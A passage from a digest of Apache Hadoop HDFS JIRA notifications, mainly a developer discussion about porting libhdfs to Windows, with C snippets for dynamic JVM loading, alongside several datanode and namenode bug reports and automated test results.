TYPE_CHECKED_PRINTF_FORMAT in platform.h as well. However, I then backed that 
out and put the ifdef in exception.h, because it has never been clear to me if 
exception.h is part of the public API

The only header file that's part of the public API is {{hdfs.h}}.  That's the 
only one we export to end-users... nobody can even get access to the other ones 
without a Hadoop source tree.  You should feel free to change, add, or remove 
things from any header file without worrying about compatibility, as long as 
that header is not {{hdfs.h}}.

bq. BTW Colin, thanks for the code review. The work so far has been aimed at a 
straight port, warts and all, but I'm happy to roll in a few more small fixes 
for existing problems while I'm in here. I'll work on a v2 of the patch.

Thanks, Chris.  I think what you've got looks pretty good... I wish all libhdfs 
patches could be this good :)

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.





[jira] [Updated] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Yongjun Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Yongjun Zhang updated HDFS-6788:


Attachment: HDFS-6788.002.patch

> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Status: Patch Available  (was: Open)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081674#comment-14081674
 ] 

Stephen Bovy commented on HDFS-573:
---

Thanks 

I am an old-fashioned IBM main-framer,  All my changes are backwards compatible 
:) 

Here is a  slice for setting up dynamic load of the JVM

// begin JVM function set-up
// new jvm function declarations
typedef jint (*FGetVMS)   ( JavaVM**, const jsize, jint* );
typedef jint (*FCreateVM) ( JavaVM**, void**, JavaVMInitArgs* );
#ifdef LOADJVM
// dynamically loaded
static FGetVMS   hdfs_fpGetVM    = NULL;
static FCreateVM hdfs_fpCreateVM = NULL;
#else
// implicitly linked and auto-loaded (original default code)
static FGetVMS   hdfs_fpGetVM    = JNI_GetCreatedJavaVMs;
static FCreateVM hdfs_fpCreateVM = JNI_CreateJavaVM;
#endif




> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Attachment: HDFS-6799.patch

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Status: Open  (was: Patch Available)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Status: Patch Available  (was: Open)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Priority: Minor  (was: Major)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Created] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)
Megasthenis Asteris created HDFS-6799:
-

 Summary: The invalidate method in SimulatedFSDataset.java failed 
to remove (invalidate) blocks from the file system.
 Key: HDFS-6799
 URL: https://issues.apache.org/jira/browse/HDFS-6799
 Project: Hadoop HDFS
  Issue Type: Bug
  Components: datanode, test
Affects Versions: 2.4.1
Reporter: Megasthenis Asteris


The invalidate(String bpid, Block[] invalidBlks) method in 
SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
system. It currently fails to do that.





[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Chris Nauroth (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081665#comment-14081665
 ] 

Chris Nauroth commented on HDFS-573:


I guess I misread something on HADOOP-10388.  I thought I saw a nice clean init 
function in the jni_helper.c over there.  I may have incorrectly assumed that 
this cascaded all the way out to the client-facing API.  :-)

Thanks for sharing your experiences, Stephen.  Unfortunately, I think we'd have 
a hard time incorporating those changes right now, given the compatibility 
concerns.

I suppose backwards-incompatible changes like this could be considered on the 
3.x release boundary.

BTW Colin, thanks for the code review.  The work so far has been aimed at a 
straight port, warts and all, but I'm happy to roll in a few more small fixes 
for existing problems while I'm in here.  I'll work on a v2 of the patch.

I have just one question though.  My initial inclination was to put 
{{TYPE_CHECKED_PRINTF_FORMAT}} in platform.h as well.  However, I then backed 
that out and put the ifdef in exception.h, because it has never been clear to 
me if exception.h is part of the public API.  Most of the functions can't 
reasonably be considered public, because of the dependence on passing a 
{{JNIEnv}}.  However, then there is {{getExceptionInfo}}.  As long as we agree 
that only hdfs.h is the public API, and not exception.h, then I'll move 
{{TYPE_CHECKED_PRINTF_FORMAT}} back to platform.h.  If client applications ever 
{{#include}} exception.h, then they'd also have the complexity of selecting 
the correct platform.h, which would be undesirable.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.





[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081663#comment-14081663
 ] 

Stephen Bovy commented on HDFS-573:
---

SAMPLE   "Optional"   INIT-LIB   function  :)

// FLAG :: init-lib invoked (speed up jvm-init and avoid locks)
extern short hdfs_JniInitLib;

extern char hdfs_HadoopHome [2000];
extern char hdfs_JavaHome [2000];

// the following are used for no-threads support
// use this flag to bypass thread logic
// enable non-threaded speed-ups
extern short hdfs_Threads;

// Init the HDFS library
int hdfsJNILibInit ( pHdfsInitParms parms )
{
    JNIEnv* env;

    // disable thread support for now.
    hdfs_Threads = 0;

    if ( parms ) {

        if ( parms->JavaHome )
        {
            if ( strlen(parms->JavaHome) >= 2000 ) {  /* leave room for the NUL */
                fprintf ( stderr, "The JAVA_HOME variable is too long.\n" );
                return 1;
            }
            strcpy ( hdfs_JavaHome, parms->JavaHome );
        }

        if ( parms->HadoopHome )
        {
            if ( strlen(parms->HadoopHome) >= 2000 ) {  /* leave room for the NUL */
                fprintf ( stderr, "The HADOOP_HOME variable is too long.\n" );
                return 1;
            }
            strcpy ( hdfs_HadoopHome, parms->HadoopHome );
        }

        if (parms->threads)
            hdfs_Threads = parms->threads;
    }

    env = getJNIEnv();
    if (!env) return 1;

    hdfs_JniInitLib = 1;

    return 0;
}



> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>


[jira] [Updated] (HDFS-6425) Large postponedMisreplicatedBlocks has impact on blockReport latency

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6425?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6425:
--

Summary: Large postponedMisreplicatedBlocks has impact on blockReport 
latency  (was: reset postponedMisreplicatedBlocks and 
postponedMisreplicatedBlocksCount when NN becomes active)

> Large postponedMisreplicatedBlocks has impact on blockReport latency
> 
>
> Key: HDFS-6425
> URL: https://issues.apache.org/jira/browse/HDFS-6425
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6425.patch
>
>
> Sometimes we have a large number of over-replicated blocks when the NN fails 
> over. When the new active NN takes over, over-replicated blocks are put into 
> postponedMisreplicatedBlocks until none of the DNs for a block are stale 
> anymore.
> We have a case where the NNs flip-flop. Before postponedMisreplicatedBlocks 
> became empty, the NN failed over again and again, so 
> postponedMisreplicatedBlocks just kept growing until the cluster stabilized.
> In addition, a large postponedMisreplicatedBlocks set can make 
> rescanPostponedMisreplicatedBlocks slow. rescanPostponedMisreplicatedBlocks 
> takes the write lock, so it can slow down block report processing.





[jira] [Updated] (HDFS-6425) Large postponedMisreplicatedBlocks has impact on blockReport latency

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6425?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6425:
--

Status: Open  (was: Patch Available)



[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081640#comment-14081640
 ] 

Stephen Bovy commented on HDFS-573:
---

Thanks Chris, 

We have had some offline discussions before.  Thanks for the explanation.

I have indeed added many enhancements. I would need to get management 
permission to share these (sigh) :)

I have added optional support for dynamically loading the JVM. This simplifies 
build issues and solves a lot of configuration and usage issues.

I have indeed added an optional lib-init function, and have also added support 
for using a global static for the JVM pointer.

I have added support for a thread flag, which can be set statically by the 
compiler or dynamically in the lib-init.

When the thread flag is not set, I use a static global to save the thread-env 
pointer that gets created along with the JVM, and I only need to access that 
one pointer in one place.

When the thread flag is not set, all the special thread code is bypassed with 
IF statements.

I have tested this in thread mode with the thread tester, and of course I am 
using it with my app in non-thread mode.

Works great either way.






[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081637#comment-14081637
 ] 

Colin Patrick McCabe commented on HDFS-573:
---

bq. I am probably exposing my ignorance, so please forgive me. Are you saying 
that using JNI automatically implies and requires thread support

Yep, that's what I'm saying.

bq. and that every JNI call is running on a thread?

Not every JNI call runs in a different thread, but many HDFS JNI calls 
certainly do.  For example, {{hdfsWrite}} uses {{DFSOutputStream}}, which ends 
up starting a thread to write to the pipeline.

bq. From my very quick scan of the HADOOP-10388 branch, it looks like we'll be 
providing a clearer initialization sequence there. libhdfs likely will need to 
remain this way though.

I agree 100% that libhdfs should have had an "init" function that created some 
kind of context we could pass around.  But... we're going to try to keep the 
existing API in HADOOP-10388.  :P  Sorry, it's just really nice to keep 
compatibility where you can.



[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Chris Nauroth (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081621#comment-14081621
 ] 

Chris Nauroth commented on HDFS-573:


I think there are 2 aspects to the question:

# libhdfs embeds a JVM.  The JVM itself always runs multiple internal threads, 
even if your libhdfs application code doesn't run multiple threads.  This means 
that by extension, a libhdfs application is always multi-threaded, even if the 
application's code is entirely single-threaded/synchronous.  This rules out 
things like linking to a single-threaded C runtime library for a supposed 
performance boost with single-core execution.  A libhdfs application must 
always link to a C runtime library with multi-threading support.
# As far as the data structures inside the libhdfs code itself, you're correct 
that there is no thread safety concern if the application runs entirely 
single-threaded and makes synchronous calls.  Technically, we don't need a lock 
around the hash table in that case.  However, it might just cause end user 
confusion if we publish thread-safe vs. non-thread-safe builds or some kind of 
configuration flag to skip the locking.  The effects of running multiple 
threads without the locking would be catastrophic, probably a crash of some 
sort.  I haven't personally seen contention on this lock cause a real-world 
performance bottleneck, so I wonder if such an optimization is necessary.

For the scope of this patch, I'd prefer to focus on a straight-up port of the 
existing code to work on Windows.  We're taking a big step here, moving from 
not even compiling on Windows to fully functional, and the patch is already 
pretty large.  :-)  Potential performance enhancements certainly are welcome in 
separate patches.

FWIW, I think libhdfs has a weakness in that it has no clear-cut "initialize" 
function for the application to call during a single-threaded bootstrap 
sequence.  This would have given us an easy place to start the {{JavaVM}} and 
pre-populate the mapping of class names to class references.  Unfortunately, it 
would be backwards-incompatible to add that function now and demand existing 
applications change their code to call our initialize function.  Instead, we 
have no choice but to do lazy initialization, and that drives a lot of the 
complexity in libhdfs with the mutexes and the thread-local storage.  From my 
very quick scan of the HADOOP-10388 branch, it looks like we'll be providing a 
clearer initialization sequence there.  libhdfs likely will need to remain this 
way though.



[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081618#comment-14081618
 ] 

Colin Patrick McCabe commented on HDFS-6482:


Why don't we merge this to trunk and then open another JIRA to iron out any 
issues with rolling upgrades between different DN layout versions.  At minimum, 
we should decide whether we support rolling DN upgrades between different 
layout versions, and if we don't support it, give a clear failure message to 
admins.  But this patch is big enough that I don't think cramming all that into 
here is a good idea.  There also seem to be some issues with rolling DN 
downgrade now (for example, HDFS-6005 removed {{datanode \-rollingupgrade 
\-rollback}}, but not the usage text for it displayed in {{\-help}}.)

> Use block ID-based block layout on datanodes
> 
>
> Key: HDFS-6482
> URL: https://issues.apache.org/jira/browse/HDFS-6482
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6482-design.doc, HDFS-6482.1.patch, HDFS-6482.2.patch, 
> HDFS-6482.3.patch, HDFS-6482.4.patch, HDFS-6482.5.patch, HDFS-6482.6.patch, 
> HDFS-6482.7.patch, HDFS-6482.8.patch, HDFS-6482.9.patch, HDFS-6482.patch, 
> hadoop-24-datanode-dir.tgz
>
>
> Right now blocks are placed into directories that are split into many 
> subdirectories when capacity is reached. Instead we can use a block's ID to 
> determine the path it should go in. This eliminates the need for the LDir 
> data structure that facilitates the splitting of directories when they reach 
> capacity as well as fields in ReplicaInfo that keep track of a replica's 
> location.
> An extension of the work in HDFS-3290.





[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread James Thomas (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081607#comment-14081607
 ] 

James Thomas commented on HDFS-6482:


Or [~kihwal]?



[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread James Thomas (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081603#comment-14081603
 ] 

James Thomas commented on HDFS-6482:


[~sureshms] Is the documentation in the Rollback section at 
http://hadoop.apache.org/docs/r2.4.0/hadoop-project-dist/hadoop-hdfs/HdfsRollingUpgrade.html
 correct? You are supposed to restart the DNs normally, without flags like 
"-rollback" or "-rollingupgrade rollback"? If you restart the DNs with 
"-rollback", everything should work normally and the previous directory should 
be restored with the old layout. [~arpitagarwal], any thoughts on this?



[jira] [Updated] (HDFS-6791) A block could remain under replicated if all of its replicas are on decommissioned nodes

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6791?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6791:
--

Assignee: Ming Ma
  Status: Patch Available  (was: Open)

> A block could remain under replicated if all of its replicas are on 
> decommissioned nodes
> 
>
> Key: HDFS-6791
> URL: https://issues.apache.org/jira/browse/HDFS-6791
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6791.patch
>
>
> Here is the scenario.
> 1. Normally, before the NN transitions a DN to the decommissioned state, 
> enough replicas have been copied to other "in service" DNs. However, in some 
> rare situations, the cluster gets into a state where a DN is decommissioned 
> and a block's only replica is on that DN. In this state, the replication 
> count reported by fsck is 1 and the block just stays under replicated; 
> applications can still read the data, since decommissioned nodes can serve 
> read traffic.
> This can happen in some error situations such as DN failure or NN failover. 
> For example:
> a) A block's only replica is temporarily on node A.
> b) The decommission process is started on node A.
> c) While node A is in the "decommission-in-progress" state, node A crashes. 
> The NN marks node A as dead.
> d) After node A rejoins the cluster, the NN marks node A as decommissioned.
> 2. In theory, the NN should take care of under replicated blocks, but it 
> doesn't for this special case where the only replica is on a decommissioned 
> node. That is because the NN has the policy that a decommissioned node can't 
> be picked as the source node for replication:
> {noformat}
> BlockManager.java
> chooseSourceDatanode
>   // never use already decommissioned nodes
>   if(node.isDecommissioned())
>     continue;
> {noformat}
> 3. Since the NN marks the node as decommissioned, admins will shut down the 
> datanode, and the under replicated blocks turn into missing blocks.
> 4. The workaround is to recommission the node so that the NN can start 
> replication from it.





[jira] [Updated] (HDFS-6791) A block could remain under replicated if all of its replicas are on decommissioned nodes

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6791?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6791:
--

Attachment: HDFS-6791.patch

The patch keeps the node in DECOMMISSION_INPROGRESS state if the node becomes 
dead during decommission. In that way, the decommission can resume when the 
node rejoins the cluster later.



[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081569#comment-14081569
 ] 

Hadoop QA commented on HDFS-573:


{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658964/HDFS-573.1.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 6 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover
  org.apache.hadoop.hdfs.TestLeaseRecovery2

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7514//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7514//console

This message is automatically generated.



[jira] [Commented] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081571#comment-14081571
 ] 

Hadoop QA commented on HDFS-6796:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658967/HDFS-6796.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 1 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7513//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7513//console

This message is automatically generated.

> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6796.patch
>
>
> Currently the balancer CLI parser simply checks whether the total number of 
> arguments is greater than 2 inside the loop. Since the check does not involve 
> the loop variable, it is not a proper check when there are more than 2 
> arguments.





[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081555#comment-14081555
 ] 

Stephen Bovy commented on HDFS-573:
---

Thanks,

I am probably exposing my ignorance, so please forgive me. Are you saying 
that using JNI automatically implies and requires thread support, and that 
every JNI call is running on a thread?

My hdfs client does not use threads, so each hdfs call is synchronous, each 
JNI call is also synchronous, and within that context the code accessing the 
hash table should also be synchronous. Please correct me gently if I am 
wrong :)


> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
